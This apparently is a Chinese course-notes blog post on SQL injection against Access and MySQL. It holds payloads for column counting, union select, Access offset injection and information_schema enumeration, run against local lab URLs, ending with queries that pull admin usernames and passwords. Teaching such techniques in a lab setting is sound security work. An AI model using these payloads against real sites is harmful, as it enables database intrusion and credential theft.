第24天:WEB攻防-通用漏洞SQL注入MYSQL跨库ACCESS偏移

2023-10-11 19:50

本文主要是介绍第24天:WEB攻防-通用漏洞SQL注入MYSQL跨库ACCESS偏移,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

access注入基本流程

access数据库结构

access数据库类型判断

access数据库注入可分为两种注入方法

联合查询法

(1) order by 语句查字段

2,union select查询表

猜关键表名:

通过偏移注入获取字段名及值

Mysql数据库注入


access注入基本流程

        1.判断有无注入

        2.猜解表名

        3.猜解字段

access数据库结构

表名---->列名---->内容数据 不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、

而access的话只有若干张表。

access数据库类型判断

根据url文件后缀初步判断,一般asp和access数据库连用,通过and (select count(*) from msysobjects)>0判断是否为access,如果返回错误页面证明数据库为access。

msysobjects是access数据库的系统表之一,access数据库共有三个系统表,分别为msysobjects 、msysqueries、msysrelationships,这三个系统表在web环境下是没有访问权 限的,因此可以通过错误回显来判断access数据库

access数据库注入可分为两种注入方法,一种为联合查询法,一种为逐字猜解法,都是属于SQL的语句。那先来说下联合查询法吧

access数据库注入可分为两种注入方法

联合查询法

(1) order by 语句查字段

?id=1 order by N(通过遍历N的值,当页面报错时,字段数为N-1)

列如:

输入:?id=5 order by 11页面正常 输入:?id=5 order by 12页面报错 , 说明有11列

union select查询表

通过列数猜解     

url就是 127.0.0.1/1.asp?id=-1 union select 1,2,3,4,5 ,6,7,8,9,10,11 from admin

table_name 可以通过猜,

猜关键表名:

127.0.0.1/1.asp?id=1 and exists(select count(*) from admin)正常输出页面说明有admin表,也可以使用字典爆破

当上一步完成成功后,获取到了表名,url就变成了127.0.0.1/1.asp?id=-1 union select 1,2,3,4,5 from admin          admin是获取的表名

列如: 出现了回显点  22,33

猜解关键字段名并获取关键字段的数据:

?id=5 union select 11,username,password,44,55,66,77,88,91,111,222 from admin

其中   表名都是要靠字典去猜的,逐步爆出数据库相关信息

通过偏移注入获取字段名及值

22个字段 

到16后才正确,所以*代表6

 

二级偏移:payload构造 ,选择偏移语句在 22-(6*6)后,爆出数据

 还未爆出想要的数据  再-6 使用三级偏移语句

 

Mysql数据库注入

判断是否存在注入点:

id =1 ' and '1' ='1

 最常见加   '  报错    and 1=1 or 1=1 or 1=2 判断回显是否变化(后期注入需要考虑闭合)

1,判断字段个数 使用 order by  x     错误回显来知道字段数;

127.0.0.1/1.php?id=1 order by 5 回显正常

127.0.0.1/1.php?id=1 order by 6 回显不正常 报错

判断该表中字段数为5

构造payload 127.0.0.1/1.php?id=-1 union select 1,2,3,4,5 判断回显点

其中  2,3为回显点

在构造payload 127.0.0.1/1.php?id=-1 union select 1,database(),user(),4,5

 ​​​​

获取相关数据:

1、数据库版本-看是否符合information_schema查询-version()-5.5.532

information_schema --5.0以上版本才有    现在 大部分都是了

2、数据库用户-看是否符合ROOT型注入攻击-user()-root@localhost

3、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os-win

4、数据库名字-为后期猜解指定数据库下的表,列做准备-database()-syguestbook

127.0.0.1/1.php?id=-1 union select 1,2,3,4,databases from information_schema.schema //查询所有数据库
127.0.0.1/1.php?id=-1 union select 1,2,3,4,table_name from information_schema.tables where table_schema='test' //查询test下的表名
127.0.0.1/1.php?id=-1 union select 1,2,3,4,column_name from information_schema.columns where table_schema='test' and table_name='test1' //查询test数据库下test1表中的所有字段
127.0.0.1/1.php?id=-1 union select 1,2,3,id,pass from test.test1
//查询test数据库中test1表的id值和pass值

 常用语法:

爆出所有数据库

union select 1,group_concat(schema_name),3 from information_schema.schemata

获取特定数据库表名

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'pikachu'    

获取特定数据库特定表列数据

union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'

查询user的数据,根据实际来变化里面的内容

union select 1,username,password from pikachu.users
 

获取syguestbook数据库下面的表名信息:

UNION SELECT table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='syguestbook'

获取表名sy_adminuser的列名信息:

UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='sy_adminuser' and table_schema='syguestbook'

获取指定数据:

UNION SELECT username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from sy_adminuser

 爆出2 5 4  填入

 

 

这篇关于第24天:WEB攻防-通用漏洞SQL注入MYSQL跨库ACCESS偏移的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/190431

相关文章

Ubuntu中远程连接Mysql数据库的详细图文教程

《Ubuntu中远程连接Mysql数据库的详细图文教程》Ubuntu是一个以桌面应用为主的Linux发行版操作系统,这篇文章主要为大家详细介绍了Ubuntu中远程连接Mysql数据库的详细图文教程,有... 目录1、版本2、检查有没有mysql2.1 查询是否安装了Mysql包2.2 查看Mysql版本2.

基于SpringBoot+Mybatis实现Mysql分表

《基于SpringBoot+Mybatis实现Mysql分表》这篇文章主要为大家详细介绍了基于SpringBoot+Mybatis实现Mysql分表的相关知识,文中的示例代码讲解详细,感兴趣的小伙伴可... 目录基本思路定义注解创建ThreadLocal创建拦截器业务处理基本思路1.根据创建时间字段按年进

Python3.6连接MySQL的详细步骤

《Python3.6连接MySQL的详细步骤》在现代Web开发和数据处理中,Python与数据库的交互是必不可少的一部分,MySQL作为最流行的开源关系型数据库管理系统之一,与Python的结合可以实... 目录环境准备安装python 3.6安装mysql安装pymysql库连接到MySQL建立连接执行S

MySQL双主搭建+keepalived高可用的实现

《MySQL双主搭建+keepalived高可用的实现》本文主要介绍了MySQL双主搭建+keepalived高可用的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,... 目录一、测试环境准备二、主从搭建1.创建复制用户2.创建复制关系3.开启复制,确认复制是否成功4.同

MyBatis 动态 SQL 优化之标签的实战与技巧(常见用法)

《MyBatis动态SQL优化之标签的实战与技巧(常见用法)》本文通过详细的示例和实际应用场景,介绍了如何有效利用这些标签来优化MyBatis配置,提升开发效率,确保SQL的高效执行和安全性,感... 目录动态SQL详解一、动态SQL的核心概念1.1 什么是动态SQL?1.2 动态SQL的优点1.3 动态S

Mysql表的简单操作(基本技能)

《Mysql表的简单操作(基本技能)》在数据库中,表的操作主要包括表的创建、查看、修改、删除等,了解如何操作这些表是数据库管理和开发的基本技能,本文给大家介绍Mysql表的简单操作,感兴趣的朋友一起看... 目录3.1 创建表 3.2 查看表结构3.3 修改表3.4 实践案例:修改表在数据库中,表的操作主要

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

mysql出现ERROR 2003 (HY000): Can‘t connect to MySQL server on ‘localhost‘ (10061)的解决方法

《mysql出现ERROR2003(HY000):Can‘tconnecttoMySQLserveron‘localhost‘(10061)的解决方法》本文主要介绍了mysql出现... 目录前言:第一步:第二步:第三步:总结:前言:当你想通过命令窗口想打开mysql时候发现提http://www.cpp

MySQL大表数据的分区与分库分表的实现

《MySQL大表数据的分区与分库分表的实现》数据库的分区和分库分表是两种常用的技术方案,本文主要介绍了MySQL大表数据的分区与分库分表的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录1. mysql大表数据的分区1.1 什么是分区?1.2 分区的类型1.3 分区的优点1.4 分